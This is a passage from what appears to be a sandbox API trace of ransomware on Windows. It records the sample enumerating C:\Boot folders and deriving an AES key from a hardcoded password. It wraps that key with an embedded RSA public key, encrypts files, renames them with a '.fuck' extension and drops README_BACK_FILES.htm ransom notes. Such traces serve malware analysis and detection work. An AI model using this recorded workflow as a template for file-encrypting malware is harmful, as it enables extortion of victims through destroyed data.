(lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.719] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df408) returned 1 [0126.720] CryptCreateHash (in: hProv=0x27df408, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.720] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.720] CryptHashData (hHash=0x69d6e8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.720] CryptDeriveKey (in: hProv=0x27df408, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d368) returned 1 [0126.720] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.720] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.721] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed658) returned 1 [0126.721] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed658, dwCertEncodingType=0x1, pInfo=0x27da1d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da208*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da210*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dbe8) returned 1 [0126.721] CryptEncrypt (in: hKey=0x69dbe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.721] CryptEncrypt (in: hKey=0x69dbe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ed878*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ed878*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.721] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ed878*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ed878*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.722] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27efa58, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27efa58, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.722] CryptEncrypt (in: hKey=0x69d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27efa58*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27efa58*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.722] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27efa58*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27efa58*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.722] CloseHandle (hObject=0xffffffff) returned 1 [0126.722] CloseHandle (hObject=0x5cd8) returned 1 [0126.722] CopyFileA (lpExistingFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.725] SetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.726] DeleteFileA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.gsg")) returned 1 [0126.727] MoveFileA (lpExistingFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.fuck")) returned 0 [0126.727] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.727] CryptDestroyKey (hKey=0x69d368) returned 1 [0126.727] CryptReleaseContext (hProv=0x27df408, dwFlags=0x0) returned 1 [0126.727] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.727] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0126.727] GetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\et-ee\\readme_back_files.htm")) returned 0xffffffff [0126.727] AreFileApisANSI () returned 1 [0126.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d280, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.727] CreateFileW (lpFileName="C:\\\\Boot\\et-EE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\et-ee\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.727] GetFileType (hFile=0x5cec) returned 0x1 [0126.727] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.728] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.728] FindFirstFileA (in: lpFileName="C:\\\\Boot\\fi-FI\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d6e8 [0126.729] FindNextFileA (in: hFindFile=0x69d6e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.729] FindNextFileA (in: hFindFile=0x69d6e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.729] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.729] GetLastError () returned 0x0 [0126.729] GetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0126.729] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.730] CreateFileA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.730] CreateFileA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.730] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.730] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed3b0) returned 1 [0126.732] CryptCreateHash (in: hProv=0x27ed3b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.732] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.732] CryptHashData (hHash=0x69d328, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.732] CryptDeriveKey (in: hProv=0x27ed3b0, Algid=0x6610, hBaseData=0x69d328, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.732] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.732] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.732] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed768) returned 1 [0126.732] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed768, dwCertEncodingType=0x1, pInfo=0x27dae08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dae38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dae40*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69daa8) returned 1 [0126.732] CryptEncrypt (in: hKey=0x69daa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.732] CryptEncrypt (in: hKey=0x69daa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ec888*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ec888*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.733] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ec888*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ec888*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.733] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27efa58, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27efa58, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.733] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27efa58*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27efa58*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.733] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27efa58*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27efa58*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.733] CloseHandle (hObject=0xffffffff) returned 1 [0126.734] CloseHandle (hObject=0x5cd8) returned 1 [0126.734] CopyFileA (lpExistingFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.738] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.738] DeleteFileA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.gsg")) returned 1 [0126.745] MoveFileA (lpExistingFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.fuck")) returned 0 [0126.745] CryptDestroyHash (hHash=0x69d328) returned 1 [0126.745] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.745] CryptReleaseContext (hProv=0x27ed3b0, dwFlags=0x0) returned 1 [0126.745] FindNextFileA (in: hFindFile=0x69d6e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.745] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.745] GetLastError () returned 0x5 [0126.745] GetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui")) returned 0x20 [0126.745] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0126.745] CreateFileA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.746] CreateFileA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.746] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.746] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ecff8) returned 1 [0126.748] CryptCreateHash (in: hProv=0x27ecff8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.748] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.748] CryptHashData (hHash=0x69d368, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.748] CryptDeriveKey (in: hProv=0x27ecff8, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.748] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.748] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.748] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed7f0) returned 1 [0126.748] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed7f0, dwCertEncodingType=0x1, pInfo=0x27db078*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db0a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db0b0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69e0a8) returned 1 [0126.748] CryptEncrypt (in: hKey=0x69e0a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.748] CryptEncrypt (in: hKey=0x69e0a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ed438*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ed438*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.749] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ed438*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ed438*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.750] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27f0a60, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f0a60, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.750] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27f0a60*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27f0a60*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.750] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27f0a60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f0a60*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.750] CloseHandle (hObject=0xffffffff) returned 1 [0126.750] CloseHandle (hObject=0x5cd8) returned 1 [0126.750] CopyFileA (lpExistingFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0126.753] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0126.754] DeleteFileA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.gsg")) returned 1 [0126.754] MoveFileA (lpExistingFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.fuck")) returned 0 [0126.755] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.755] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.755] CryptReleaseContext (hProv=0x27ecff8, dwFlags=0x0) returned 1 [0126.755] FindNextFileA (in: hFindFile=0x69d6e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.755] FindClose (in: hFindFile=0x69d6e8 | out: hFindFile=0x69d6e8) returned 1 [0126.755] GetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fi-fi\\readme_back_files.htm")) returned 0xffffffff [0126.755] AreFileApisANSI () returned 1 [0126.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d1a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.755] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fi-fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.756] GetFileType (hFile=0x5cec) returned 0x1 [0126.757] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.757] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.757] FindFirstFileA (in: lpFileName="C:\\\\Boot\\Fonts\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0126.880] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.881] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.881] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.881] GetLastError () returned 0x0 [0126.881] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0126.882] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.882] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.882] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.883] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.883] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27eca20) returned 1 [0126.885] CryptCreateHash (in: hProv=0x27eca20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.885] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.885] CryptHashData (hHash=0x69d368, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.886] CryptDeriveKey (in: hProv=0x27eca20, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0126.886] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.886] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.886] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed3b0) returned 1 [0126.886] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed3b0, dwCertEncodingType=0x1, pInfo=0x27da858*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da888*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da890*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69e0e8) returned 1 [0126.886] CryptEncrypt (in: hKey=0x69e0e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.886] CryptEncrypt (in: hKey=0x69e0e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ece60*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ece60*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.886] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ece60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ece60*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.887] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27f0a60, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f0a60, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.887] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27f0a60*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27f0a60*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.888] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27f0a60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f0a60*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.888] CloseHandle (hObject=0xffffffff) returned 1 [0126.888] CloseHandle (hObject=0x5cd8) returned 1 [0126.888] CopyFileA 